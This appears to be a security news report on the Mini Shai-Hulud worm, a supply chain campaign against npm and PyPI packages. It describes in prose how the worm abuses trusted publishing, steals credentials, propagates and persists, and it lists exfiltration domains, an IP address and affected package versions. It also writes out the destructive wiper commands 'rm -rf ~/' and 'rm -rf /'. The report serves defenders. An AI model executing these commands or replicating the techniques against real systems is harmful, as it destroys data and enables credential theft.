Mini Shai-Hulud Worm

The threat actor known as TeamPCP has been connected to a sophisticated supply chain attack campaign targeting widely used npm and PyPI packages associated with TanStack, UiPath, Mistral AI, OpenSearch, Guardrails AI, and several other ecosystems. The operation, tied to the evolving Mini Shai-Hulud malware campaign, demonstrates a significant escalation in software supply chain abuse and identity-driven compromise techniques.

Researchers identified that malicious npm packages were modified to include an obfuscated JavaScript component named router_init.js. This payload profiles infected environments and deploys an advanced credential stealer targeting cloud providers, cryptocurrency wallets, AI development tools, messaging platforms, CI/CD systems, and GitHub Actions environments. Exfiltrated data is primarily transmitted to the filev2.getsession.org domain.

The use of Session Protocol infrastructure highlights a deliberate attempt to evade enterprise security controls. Because the domain belongs to a decentralized privacy-focused messaging platform, it is less likely to be blocked by traditional network defenses. As a secondary exfiltration method, encrypted data is committed to attacker-controlled repositories through the GitHub GraphQL API using stolen GitHub authentication tokens under the author identity claude@users.noreply.github.com.

Persistence Mechanisms and Credential Theft Expansion

The malware introduces several persistence and surveillance capabilities designed to maintain long-term access to compromised development environments. Persistence hooks are established inside Claude Code and Microsoft Visual Studio Code, allowing the malware to survive system reboots and automatically relaunch whenever the IDEs are opened.

In addition, a gh-token-monitor service is deployed to continuously monitor and re-exfiltrate GitHub tokens. Two malicious GitHub Actions workflows are also injected into compromised repositories. These workflows serialize repository secrets into JSON format and upload the data to the external endpoint api.masscan.cloud.

The latest TanStack compromise differs significantly from earlier supply chain incidents. Rather than relying on a preinstall hook, attackers embedded a malicious JavaScript file directly into package tarballs while introducing an optional dependency linked to a GitHub-hosted package. That dependency contains a prepare lifecycle hook that executes the payload through the Bun runtime environment.

The trojanized Mistral AI packages adopted an older infection strategy by modifying the package.json file with a preinstall hook that invokes node setup.mjs. This process downloads Bun and executes the same credential-stealing malware.

CVE-2026-45321 and the Abuse of Trusted Publishing

The TanStack compromise has been officially tracked as CVE-2026-45321 and assigned a critical CVSS score of 9.6. Investigators confirmed that 42 packages and 84 versions within the TanStack ecosystem were affected.

Analysis revealed that the compromise originated from a chained GitHub Actions attack exploiting the pull_request_target trigger, GitHub Actions cache poisoning, and runtime extraction of OIDC tokens from GitHub Actions runners. Attackers reportedly staged malicious payloads through orphaned commits in GitHub forks before injecting them into npm package tarballs. The attackers then hijacked legitimate TanStack/router workflows to publish compromised packages with valid SLSA provenance attestations.

This development marks a historic escalation in software supply chain attacks. The malicious packages carried valid SLSA Build Level 3 provenance signatures, making this the first documented npm worm capable of distributing malicious packages with authentic build attestations. The malware campaign subsequently expanded beyond TanStack and spread into ecosystems maintained by UiPath, DraftLab, and other developers.

The operation heavily abuses trusted publishing workflows. Instead of stealing npm credentials directly, attacker-controlled code running inside trusted CI/CD pipelines leveraged OIDC permissions to mint short-lived publishing tokens during the build process. This allowed malicious packages to be published through legitimate release pipelines while bypassing conventional authentication safeguards.

Self-Propagating Worm Behavior Raises Alarm

One of the most dangerous aspects of the Mini Shai-Hulud campaign is its worm-like propagation model. The malware actively searches for publishable npm tokens configured with bypass_2fa=true, enumerates packages maintained by the compromised developer, and exchanges GitHub OIDC tokens for per-package publish tokens. This mechanism enables the malware to spread laterally across package ecosystems without relying on traditional credential theft techniques.

The attack also exploited repository-level trust configurations inside GitHub's OIDC trusted publisher model. Because trust was granted broadly at the repository level instead of being restricted to protected branches and specific workflow files, malicious workflow executions triggered by orphaned commits were able to request legitimate npm publish tokens.

Another disturbing capability involves the deployment of a 'dead-man's switch.' The malware installs a shell script that repeatedly polls the api.github.com/user endpoint every 60 seconds to determine whether attacker-created npm tokens remain active. These tokens carry the threatening description IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner.

If defenders revoke the token through the npm dashboard, the malware launches a destructive routine executing rm -rf ~/, effectively transforming the infection into wiper malware. This aggressive behavior indicates a substantial evolution in TeamPCP's operational tactics and demonstrates increasing sophistication in coercive persistence methods. Security teams are therefore advised to isolate and image infected systems before revoking compromised npm credentials.

Affected Packages and Expanding Ecosystem Impact

The campaign has impacted more than 170 packages across both npm and PyPI, collectively accounting for over 518 million downloads. Investigators also identified at least 400 repositories created using stolen credentials, all containing the phrase 'Shai-Hulud: Here We Go Again.'

Affected packages include:

guardrails-ai@0.10.1 (PyPI)
mistralai@2.4.6 (PyPI)
@opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, 3.8.0
@squawk/mcp@0.9.5
@squawk/weather@0.5.10
@squawk/flightplan@0.5.6
@tallyui/connector-medusa@1.0.1, 1.0.2, 1.0.3
@tallyui/connector-vendure@1.0.1, 1.0.2, 1.0.3

The malware also employs multiple redundant exfiltration channels. In addition to Session Protocol infrastructure and GitHub dead drops, stolen credentials are transmitted through the typosquatted domain git-tanstack.com.

PyPI Malware Introduces Geofenced Destructive Logic

The Python-based malware variants associated with the malicious Mistral AI and Guardrails AI packages differ substantially from the JavaScript payloads distributed via npm. The compromised mistralai PyPI package downloads a credential stealer from the remote host 83.142.209.194.

Researchers discovered that the Python malware contains country-aware logic designed to avoid execution in Russian-language environments. It also includes a geofenced destructive mechanism that introduces a one-in-six probability of executing rm -rf / if the infected system appears to be located in Israel or Iran.

This behavior demonstrates a concerning evolution toward region-aware destructive payload deployment within open-source package ecosystems.

The Growing Threat of Identity-Driven Supply Chain Attacks

The Mini Shai-Hulud campaign reflects a broader transformation in modern supply chain attacks. Rather than focusing solely on package compromise, threat actors are increasingly targeting trusted CI/CD identities, publishing workflows, and cloud-based automation pipelines.

Once attackers gain access to software publishing infrastructure, the development pipeline itself becomes the malware distribution mechanism. Because many malicious actions occur through legitimate workflows, trusted attestations, and authentic release systems, traditional security controls may fail to identify malicious behavior.

Key characteristics defining this new generation of supply chain attacks include:

• Abuse of trusted publishing and OIDC token exchange mechanisms
• Propagation through legitimate CI/CD workflows and build systems
• Use of valid SLSA attestations to disguise malicious packages
• Multi-channel credential exfiltration and persistence operations
• Destructive retaliation mechanisms designed to intimidate defenders

The campaign's expansion across AI tooling, enterprise automation, search infrastructure, frontend development, aviation-related tooling, and CI/CD ecosystems demonstrates how deeply interconnected software supply chains have become. Behavioral monitoring during package installation and build execution is now increasingly critical for detecting threats that appear legitimate at first glance.